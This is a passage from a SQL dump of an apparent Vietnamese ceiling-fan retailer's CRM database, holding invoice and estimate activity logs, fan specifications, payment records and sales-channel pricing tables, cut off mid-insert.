(2939, 'invoice', 386, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";i:1;s:4:\"0.00\";i:2;s:1:\"5\";}', '1', 'Ho Gia Phat', '2024-01-26 14:19:27'),
(2940, 'invoice', 386, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-26 14:19:27'),
(2941, 'invoice', 393, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2024-01-26 14:42:58'),
(2942, 'invoice', 393, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"12.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/397\" target=\"_blank\">#397</a>\";}', '1', 'Ho Gia Phat', '2024-01-26 14:42:58'),
(2943, 'invoice', 394, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-01-29 13:50:19'),
(2944, 'invoice', 394, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/398\" target=\"_blank\">#398</a>\";}', '17', 'Loan Nguyễn', '2024-01-29 13:50:19'),
(2945, 'estimate', 250, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2024-01-31 14:36:41'),
(2946, 'invoice', 381, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2024-02-05 01:00:01'),
(2947, 'invoice', 395, 'invoice_activity_created', '', '15', 'Tâm Nguyen Thanh', '2024-02-19 08:45:37'),
(2948, 'invoice', 395, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '15', 'Tâm Nguyen Thanh', '2024-02-19 08:46:21'),
(2949, 'invoice', 395, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"250.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/399\" target=\"_blank\">#399</a>\";}', '15', 'Tâm Nguyen Thanh', '2024-02-19 08:46:21'),
(2950, 'estimate', 251, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2024-02-19 09:53:46'),
(2951, 'estimate', 251, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2024-02-19 09:54:05'),
(2952, 'estimate', 252, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2024-02-21 10:26:31'),
(2953, 'estimate', 252, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2024-02-21 10:26:47'),
(2954, 'estimate', 252, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:767:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color: Light Chery (chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:688:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color: Light Chery (chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2024-02-21 10:46:13'),
(2955, 'estimate', 252, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2024-02-21 10:46:13'),
(2956, 'invoice', 396, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-02-21 10:46:16'),
(2957, 'estimate', 252, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/396\">INV-386-24</a>\";}', '17', 'Loan Nguyễn', '2024-02-21 10:46:16'),
(2958, 'invoice', 387, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Admin Hamilton', '2024-02-21 15:20:08'),
(2959, 'invoice', 387, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/400\" target=\"_blank\">#400</a>\";}', '1', 'Admin Hamilton', '2024-02-21 15:20:08'),
(2960, 'invoice', 389, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"147.125 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/401\" target=\"_blank\">#401</a>\";}', '1', 'Admin Hamilton', '2024-02-21 15:22:25'),
(2961, 'invoice', 389, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"401\";i:1;s:10:\"147.125 đ\";}', '1', 'Admin Hamilton', '2024-02-21 15:22:32'),
(2962, 'invoice', 389, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"147.125.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/402\" target=\"_blank\">#402</a>\";}', '1', 'Admin Hamilton', '2024-02-21 15:23:22'),
(2963, 'invoice', 396, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Admin Hamilton', '2024-02-21 23:06:09'),
(2964, 'invoice', 396, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.520.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/403\" target=\"_blank\">#403</a>\";}', '1', 'Admin Hamilton', '2024-02-21 23:06:09'),
(2965, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-02-22 01:00:05'),
(2966, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-02-25 01:00:06'),
(2967, 'estimate', 253, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2024-02-26 17:10:55'),
(2968, 'estimate', 253, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2024-02-26 17:11:01'),
(2969, 'estimate', 253, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:230:\"Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Đen <br />\r\nMàu cánh: Dark Walnut <br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan\";i:1;s:185:\"Sải cánh 142cm \r\nMàu thân quạt: Màu Đen\r\nMàu cánh: Cánh gián\r\nĐộng cơ DC, công suất 35W \r\nĐiều khiển từ xa 5 cấp độ \r\nThương hiệu: Tổ chức đào tạo WIT/China\";}', '17', 'Loan Nguyễn', '2024-02-26 17:11:53'),
(2970, 'invoice', 397, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-02-26 17:17:40'),
(2971, 'estimate', 253, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/397\">INV-387-24</a>\";}', '17', 'Loan Nguyễn', '2024-02-26 17:17:40'),
(2972, 'estimate', 251, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2024-02-27 01:00:02'),
(2973, 'invoice', 397, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-02-27 14:35:33'),
(2974, 'invoice', 397, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/404\" target=\"_blank\">#404</a>\";}', '17', 'Loan Nguyễn', '2024-02-27 14:35:33'),
(2975, 'estimate', 254, 'estimate_activity_created', '', '1', 'Admin Hamilton', '2024-02-27 15:04:16'),
(2976, 'estimate', 254, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:686:\"Đường kính cánh: 10ft ft (3.0 m)   <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum   <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed)   <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz   <br />\r\nĐiều khiển / Control: Remote Control for Wall   <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA   <br />\r\nTrọng lượng: 18 kg   <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2   <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)   <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) \";i:1;s:631:\"Đường kính cánh: 10ft ft (3.0 m)   \r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum   \r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed)   \r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz   \r\nĐiều khiển / Control: Remote Control for Wall   \r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA   \r\nTrọng lượng: 18 kg   \r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2   \r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)   \r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)\";}', '1', 'Admin Hamilton', '2024-02-27 15:04:49'),
(2977, 'estimate', 254, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:243:\"Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt  <br />\r\n\";i:1;s:209:\"Gia cố móc trần bê tông \r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) \r\n- Gia cố dây cáp inox an toàn \r\n- Đấu điện cấp nguồn cho quạt \r\n- Cân bằng hoạt động cánh quạt\";}', '1', 'Admin Hamilton', '2024-02-27 15:04:49'),
(2978, 'estimate', 254, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Admin Hamilton', '2024-02-27 15:05:14'),
(2979, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-02-28 01:00:05'),
(2980, 'estimate', 254, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:25:\"Phí quản lý thi công\";}', '1', 'Admin Hamilton', '2024-02-28 13:41:01'),
(2981, 'estimate', 254, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:114:\"Gia cố khung treo quạt trần<br />\r\nChi phí đi lại, thuê giàn giáo <br />\r\nMua vật tư phụ<br />\r\n\";i:1;s:119:\"Gia cố khung treo quạt trần\r\nChi phí đi lại, thuê giàn giáo \r\nMua vật tư sắt V hàn khung treo quạt\";}', '1', 'Admin Hamilton', '2024-02-28 13:41:49'),
(2982, 'invoice', 398, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-02-29 15:58:32'),
(2983, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-03-02 01:00:05'),
(2984, 'estimate', 251, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>3</status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:15:26'),
(2985, 'estimate', 246, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:15:47'),
(2986, 'estimate', 245, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:15:56'),
(2987, 'estimate', 244, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:16:08'),
(2988, 'estimate', 244, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:428:\"Sải cánh 150cm (60 inch)        <br />\r\nMàu cánh: Cocoa Bamboo      <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA \";i:1;s:385:\"Sải cánh 150cm (60 inch)        \r\nMàu cánh: Cocoa Bamboo      \r\nMàu thân : Universal Black        \r\nĐộng cơ EC, công suất 29.3W        \r\nĐiều khiển từ xa 7 tốc độ đi kèm        \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        \r\nBộ đèn LED tuỳ chọn thêm        \r\nThương hiệu: Haiku/USA\";}', '1', 'Admin Hamilton', '2024-03-05 13:16:08'),
(2989, 'estimate', 248, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:16:15'),
(2990, 'estimate', 250, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:16:28'),
(2991, 'estimate', 250, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Quạt trần 5 cánh gỗ tự nhiên \";i:1;s:38:\"Quạt trần 5 cánh gỗ tự nhiên\";}', '1', 'Admin Hamilton', '2024-03-05 13:16:28'),
(2992, 'estimate', 233, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:18:02'),
(2993, 'invoice', 399, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-03-05 13:26:37'),
(2994, 'invoice', 399, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-03-05 13:26:46'),
(2995, 'invoice', 399, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.020.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/405\" target=\"_blank\">#405</a>\";}', '17', 'Loan Nguyễn', '2024-03-05 13:26:46'),
(2996, 'estimate', 255, 'estimate_activity_created', '', '1', 'Admin Hamilton', '2024-03-05 13:30:17'),
(2997, 'invoice', 400, 'invoice_activity_created', '', '1', 'Admin Hamilton', '2024-03-05 13:30:24'),
(2998, 'estimate', 255, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/400\">INV-390-24</a>\";}', '1', 'Admin Hamilton', '2024-03-05 13:30:24'),
(2999, 'invoice', 400, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:30:42'),
(3000, 'invoice', 400, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"120.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/406\" target=\"_blank\">#406</a>\";}', '1', 'Admin Hamilton', '2024-03-05 13:30:42'),
(3001, 'invoice', 398, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:243:\"Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt  <br />\r\n\";i:1;s:209:\"Gia cố móc trần bê tông \r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) \r\n- Gia cố dây cáp inox an toàn \r\n- Đấu điện cấp nguồn cho quạt \r\n- Cân bằng hoạt động cánh quạt\";}', '1', 'Admin Hamilton', '2024-03-05 13:33:14'),
(3002, 'invoice', 398, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Admin Hamilton', '2024-03-05 13:33:40'),
(3003, 'invoice', 398, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"50.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/407\" target=\"_blank\">#407</a>\";}', '1', 'Admin Hamilton', '2024-03-05 13:33:40'),
(3004, 'invoice', 398, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:18:\"hotro@hogiaphat.vn\";}', '1', 'Admin Hamilton', '2024-03-05 13:33:43'),
(3005, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-03-06 01:00:04'),
(3006, 'estimate', 256, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2024-03-07 09:09:09'),
(3007, 'estimate', 256, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2024-03-07 09:09:16'),
(3008, 'invoice', 401, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2024-03-07 13:13:26'),
(3009, 'estimate', 256, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/401\">INV-391-24</a>\";}', '17', 'Loan Nguyễn', '2024-03-07 13:13:26'),
(3010, 'invoice', 389, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>hotro@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2024-03-10 01:00:05'),
(3011, 'invoice', 401, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2024-03-11 14:09:44'),
(3012, 'invoice', 401, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/408\" target=\"_blank\">#408</a>\";}', '17', 'Loan Nguyễn', '2024-03-11 14:09:44'),
(3013, 'estimate', 256, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '1', 'Admin Hamilton', '2024-03-21 22:53:22'),
(3014, 'estimate', 256, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '1', 'Admin Hamilton', '2024-03-21 23:39:39'),
(3015, 'invoice', 391, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:6:\"200000\";}', '1', 'Admin Hamilton', '2024-03-22 16:13:54'),
(3016, 'invoice', 401, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Admin WIT', '2024-06-12 16:50:31'),
(3017, 'invoice', 401, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"408\";i:1;s:10:\"350.000 đ\";}', '1', 'Admin WIT', '2024-06-12 16:50:31'),
(3018, 'invoice', 398, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Admin WIT', '2024-06-12 16:50:34'),
(3019, 'invoice', 398, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"407\";i:1;s:13:\"50.000.000 đ\";}', '1', 'Admin WIT', '2024-06-12 16:50:34'),
(3020, 'invoice', 400, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"406\";i:1;s:11:\"120,000,000\";}', '1', 'Admin WIT', '2024-06-12 17:03:05'),
(3021, 'invoice', 399, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"405\";i:1;s:9:\"6,020,000\";}', '1', 'Admin WIT', '2024-06-12 17:03:08'),
(3022, 'invoice', 397, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"404\";i:1;s:9:\"4,875,000\";}', '1', 'Admin WIT', '2024-06-12 17:03:11'),
(3023, 'invoice', 376, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"378\";i:1;s:10:\"37,760,000\";}', '1', 'Admin WIT', '2024-06-12 17:03:19'),
(3024, 'invoice', 396, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"403\";i:1;s:9:\"6,520,000\";}', '1', 'Admin WIT', '2024-06-12 17:03:56'),
(3025, 'invoice', 389, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"402\";i:1;s:11:\"147,125,000\";}', '1', 'Admin WIT', '2024-06-12 17:04:00'),
(3026, 'invoice', 387, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"400\";i:1;s:9:\"8,000,000\";}', '1', 'Admin WIT', '2024-06-12 17:04:03');

-- --------------------------------------------------------

--
-- Table structure for table `tblsales_channel`
--

CREATE TABLE `tblsales_channel` (
  `id` int(10) UNSIGNED NOT NULL,
  `channel` varchar(150) NOT NULL,
  `status` varchar(15) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsales_channel`
--

INSERT INTO `tblsales_channel` (`id`, `channel`, `status`) VALUES
(1, 'pos', 'deactivate'),
(2, 'portal', 'deactivate'),
(3, 'woocommerce', 'deactivate'),
(4, 'pre_order', 'deactivate');

-- --------------------------------------------------------

--
-- Table structure for table `tblsales_channel_detailt`
--

CREATE TABLE `tblsales_channel_detailt` (
  `id` int(10) UNSIGNED NOT NULL,
  `group_product_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `sales_channel_id` int(11) NOT NULL,
  `prices` decimal(15,2) DEFAULT NULL,
  `department` text DEFAULT NULL,
  `pre_order_product_st_id` int(11) DEFAULT NULL,
  `customer_group` text DEFAULT NULL,
  `customer` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsales_channel_detailt`
--

INSERT INTO `tblsales_channel_detailt` (`id`, `group_product_id`, `product_id`, `sales_channel_id`, `prices`, `department`, `pre_order_product_st_id`, `customer_group`, `customer`) VALUES
(1, 0, 1741, 2, 45000000.00, '', NULL, '', ''),
(2, 0, 1742, 2, 0.00, '', NULL, '', ''),
(3, 0, 1743, 2, 0.00, '', NULL, '', ''),
(4, 0, 1744, 2, 0.00, '', NULL, '', ''),
(5, 0, 1745, 2, 0.00, '', NULL, '', ''),
(6, 0, 1746, 2, 0.00, '', NULL, '', ''),
(7, 0, 1747, 2, 0.00, '', NULL, '', ''),
(8, 0, 1748, 2, 0.00, '', NULL, '', ''),
(9, 0, 1749, 2, 0.00, '', NULL, '', ''),
(10, 0, 1750, 2, 0.00, '', NULL, '', ''),
(11, 0, 1751, 2, 0.00, '', NULL, '', ''),
(12, 0, 1752, 2, 0.00, '', NULL, '', ''),
(13, 0, 1753, 2, 0.00, '', NULL, '', ''),
(14, 0, 1754, 2, 0.00, '', NULL, '', ''),
(15, 0, 1755, 2, 0.00, '', NULL, '', ''),
(16, 0, 1756, 2, 0.00, '', NULL, '', ''),
(17, 0, 1757, 2, 0.00, '', NULL, '', ''),
(18, 0, 1758, 2, 0.00, '', NULL, '', ''),
(19, 0, 1759, 2, 0.00, '', NULL, '', ''),
(20, 0, 1760, 2, 0.00, '', NULL, '', ''),
(21, 0, 1761, 2, 0.00, '', NULL, '', ''),
(22, 0, 1762, 2, 0.00, '', NULL, '', ''),
(23, 0, 1763, 2, 0.00, '', NULL, '', ''),
(24, 0, 1764, 2, 0.00, '', NULL, '', ''),
(25, 0, 1765, 2, 0.00, '', NULL, '', ''),
(26, 0, 1766, 2, 0.00, '', NULL, '', ''),
(27, 0, 1767, 2, 0.00, '', NULL, '', ''),
(28, 0, 1768, 2, 0.00, '', NULL, '', ''),
(29, 0, 1769, 2, 0.00, '', NULL, '', ''),
(30, 0, 1770, 2, 0.00, '', NULL, '', ''),
(31, 0, 1771, 2, 0.00, '', NULL, '', ''),
(32, 0, 1772, 2, 0.00, '', NULL, '', ''),
(33, 0, 1773, 2, 0.00, '', NULL, '', ''),
(34, 0, 1774, 2, 0.00, '', NULL, '', ''),
(35, 0, 1775, 2, 0.00, '', NULL, '', ''),
(36, 0, 1776, 2, 0.00, '', NULL, '', ''),
(37, 0, 1777, 2, 0.00, '', NULL, '', ''),
(38, 0, 1778, 2, 0.00, '', NULL, '', ''),
(39, 0, 1779, 2, 0.00, '', NULL, '', ''),
(40, 0, 1780, 2, 0.00, '', NULL, '', ''),
(41, 0, 1781, 2, 0.00, '', NULL, '', ''),
(42, 0, 1782, 2, 0.00, '', NULL, '', ''),
(43, 0, 1783, 2, 0.00, '', NULL, '', ''),
(44, 0, 1784, 2, 0.00, '', NULL, '', ''),
(45, 0, 1785, 2, 0.00, '', NULL, '', ''),
(46, 0, 1786, 2, 0.00, '', NULL, '', ''),
(47, 0, 1787, 2, 0.00, '', NULL, '', ''),
(48, 0, 1788, 2, 0.00, '', NULL, '', ''),
(49, 0, 1789, 2, 0.00, '', NULL, '', ''),
(50, 0, 1790, 2, 0.00, '', NULL, '', ''),
(51, 0, 1791, 2, 3300000.00, '', NULL, '', ''),
(52, 0, 1792, 2, 0.00, '', NULL, '', ''),
(53, 0, 1793, 2, 0.00, '', NULL, '', ''),
(54, 0, 1794, 2, 0.00, '', NULL, '', ''),
(55, 0, 1795, 2, 0.00, '', NULL, '', ''),
(56, 0, 1796, 2, 0.00, '', NULL, '', ''),
(57, 0, 1797, 2, 0.00, '', NULL, '', ''),
(58, 0, 1798, 2, 0.00, '', NULL, '', ''),
(59, 0, 1799, 2, 0.00, '', NULL, '', ''),
(60, 0, 1800, 2, 0.00, '', NULL, '', ''),
(61, 0, 1801, 2, 0.00, '', NULL, '', ''),
(62, 0, 1802, 2, 0.00, '', NULL, '', ''),
(63, 0, 1803, 2, 0.00, '', NULL, '', ''),
(64, 0, 1804, 2, 0.00, '', NULL, '', ''),
(65, 0, 1805, 2, 0.00, '', NULL, '', ''),
(66, 0, 1806, 2, 0.00, '', NULL, '', ''),
(67, 0, 1807, 2, 0.00, '', NULL, '', ''),
(68, 0, 1808, 2, 0.00, '', NULL, '', ''),
(69, 0, 1809, 2, 0.00, '', NULL, '', ''),
(70, 0, 1810, 2, 0.00, '', NULL, '', ''),
(71, 0, 1811, 2, 0.00, '', NULL, '', ''),
(72, 0, 1812, 2, 0.00, '', NULL, '', ''),
(73, 0, 1813, 2, 0.00, '', NULL, '', ''),
(74, 0, 1814, 2, 168000000.00, '', NULL, '', ''),
(75, 0, 1815, 2, 165000000.00, '', NULL, '', ''),
(76, 0, 1816, 2, 165000000.00, '', NULL, '', ''),
(77, 0, 1817, 2, 163000000.00, '', NULL, '', ''),
(78, 0, 1818, 2, 16900000.00, '', NULL, '', ''),
